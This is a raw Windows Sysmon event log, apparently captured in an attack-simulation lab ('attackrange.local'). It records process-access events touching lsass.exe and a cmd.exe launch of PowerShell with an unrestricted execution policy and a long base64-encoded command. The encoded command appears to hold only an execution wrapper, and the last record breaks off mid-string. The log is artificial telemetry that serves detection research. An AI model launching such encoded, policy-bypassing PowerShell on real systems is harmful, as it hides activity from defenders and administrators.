13:33:17.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.512{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3dysobch.jsz.ps12021-01-18 13:33:17.512 10341000x8000000000000000219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.512{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8E1D-6005-C402-00000000A201}32884320C:\Windows\system32\cmd.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.482{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIA